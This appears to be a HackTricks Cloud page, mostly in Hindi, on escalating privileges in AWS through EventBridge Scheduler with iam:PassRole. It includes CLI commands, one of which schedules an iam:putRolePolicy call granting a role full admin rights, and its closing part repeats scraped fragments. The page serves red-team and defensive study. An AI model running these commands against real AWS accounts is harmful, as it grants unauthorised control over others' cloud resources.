AWS - EventBridge Scheduler Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EventBridge Scheduler

EventBridge Scheduler का उपयोग विभिन्न AWS सेवाओं के लिए कॉल शेड्यूल करके विशेषाधिकार वृद्धि के लिए किया जा सकता है। इसके शेड्यूल के आधार पर सेवाओं को सक्रिय करने की क्षमता का लाभ उठाकर, पर्याप्त अनुमतियों वाले उपयोगकर्ता विशेषाधिकार बढ़ा सकते हैं। यहाँ कुछ प्रमुख क्रियाएँ हैं जिन्हें EventBridge Scheduler टेम्पलेटेड लक्ष्यों का उपयोग करके ट्रिगर कर सकता है:

Lambda: lambda:InvokeFunction - शेड्यूल पर Lambda कार्यों को सक्रिय करें।
CodeBuild: codebuild:StartBuild - AWS CodeBuild परियोजनाएँ शुरू करें।
CodePipeline: codepipeline:StartPipelineExecution - AWS CodePipeline निष्पादन को ट्रिगर करें।
ECS: ecs:RunTask - ECS कार्य चलाएँ।
EventBridge: events:PutEvents - EventBridge में घटनाएँ डालें।
Inspector: inspector:StartAssessmentRun - Amazon Inspector आकलन शुरू करें।
Kinesis: kinesis:PutRecord - Kinesis धाराओं में रिकॉर्ड डालें।
Firehose: firehose:PutRecord - Firehose डिलीवरी धाराओं में रिकॉर्ड डालें।
SageMaker: sagemaker:StartPipelineExecution - SageMaker पाइपलाइन निष्पादन शुरू करें।
SNS: sns:Publish - SNS विषयों पर संदेश प्रकाशित करें।
SQS: sqs:SendMessage - SQS कतारों में संदेश भेजें।
Step Functions: states:StartExecution - AWS Step Functions के निष्पादन शुरू करें।

ये केवल कुछ टेम्पलेटेड क्रियाएँ हैं जो EventBridge Scheduler कर सकता है। हालाँकि, सार्वभौमिक लक्ष्यों का उपयोग करके, AWS सेवाओं के बीच कई अन्य क्रियाएँ सक्रिय की जा सकती हैं। सार्वभौमिक लक्ष्य टेम्पलेटेड सूची से परे अधिक व्यापक API संचालन की अनुमति देते हैं।

EventBridge Scheduler के बारे में अधिक जानकारी:

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

उपयोगकर्ता जिनके पास sts:AssumeRole, iam:PassRole, और scheduler:CreateSchedule या scheduler:UpdateSchedule अनुमतियाँ हैं, वे EventBridge Scheduler का लाभ उठाकर उच्च विशेषाधिकार वाली भूमिका का उपयोग करके विशेषाधिकार बढ़ा सकते हैं।

इन अनुमतियों के साथ, एक हमलावर उच्च विशेषाधिकार वाली भूमिका ग्रहण कर सकता है और शेड्यूल बनाते या अपडेट करते समय उस भूमिका को EventBridge Scheduler को पास कर सकता है। शेड्यूल को पहले सूचीबद्ध किसी भी क्रिया को करने के लिए कॉन्फ़िगर किया जा सकता है, जैसे Lambda कार्यों को सक्रिय करना, ECS कार्य शुरू करना, CodePipeline निष्पादन को ट्रिगर करना, या EventBridge Scheduler द्वारा समर्थित 270 AWS सेवाओं में से किसी भी ऑपरेशन को करना। इन क्रियाओं को शेड्यूल करके, एक हमलावर AWS सेवाओं के बीच अनधिकृत संचालन करने के लिए उच्च विशेषाधिकार का दुरुपयोग कर सकता है। \

उदाहरण के लिए, वे शेड्यूल को एक Lambda कार्य को सक्रिय करने के लिए कॉन्फ़िगर कर सकते हैं जो एक टेम्पलेटेड क्रिया है:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

EventBridge Scheduler में टेम्पलेटेड सेवा क्रियाओं के अलावा, आप कई AWS सेवाओं के लिए API संचालन को सक्रिय करने के लिए यूनिवर्सल टारगेट का उपयोग कर सकते हैं। यूनिवर्सल टारगेट लगभग किसी भी API को सक्रिय करने के लिए लचीलापन प्रदान करते हैं। एक उदाहरण "AdminAccessPolicy" जोड़ने के लिए यूनिवर्सल टारगेट का उपयोग करना हो सकता है, एक भूमिका का उपयोग करते हुए जिसमें "putRolePolicy" नीति है:

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

संदर्भ

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या telegram समूह में शामिल हों या Twitter 🐦 पर हमें फॉलो करें @hacktricks_live.
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PR सबमिट करें।

PreviousAWS - EMR Privesc NextAWS - Gamelift

Last updated 1 day ago

EventBridge Scheduler

Lambda: lambda:InvokeFunction - शेड्यूल पर Lambda कार्यों को सक्रिय करें।

CodeBuild: codebuild:StartBuild - AWS CodeBuild परियोजनाएँ शुरू करें।

CodePipeline: codepipeline:StartPipelineExecution - AWS CodePipeline निष्पादन को ट्रिगर करें।

ECS: ecs:RunTask - ECS कार्य चलाएँ।

EventBridge: events:PutEvents - EventBridge में घटनाएँ डालें।

Inspector: inspector:StartAssessmentRun - Amazon Inspector आकलन शुरू करें।

Kinesis: kinesis:PutRecord - Kinesis धाराओं में रिकॉर्ड डालें।

Firehose: firehose:PutRecord - Firehose डिलीवरी धाराओं में रिकॉर्ड डालें।

SageMaker: sagemaker:StartPipelineExecution - SageMaker पाइपलाइन निष्पादन शुरू करें।

SNS: sns:Publish - SNS विषयों पर संदेश प्रकाशित करें।

SQS: sqs:SendMessage - SQS कतारों में संदेश भेजें।

Step Functions: states:StartExecution - AWS Step Functions के निष्पादन शुरू करें।

EventBridge Scheduler के बारे में अधिक जानकारी:

AWS - EventBridge Scheduler Enum

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

संदर्भ

EventBridge Scheduler

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

संदर्भ

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)

`iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`)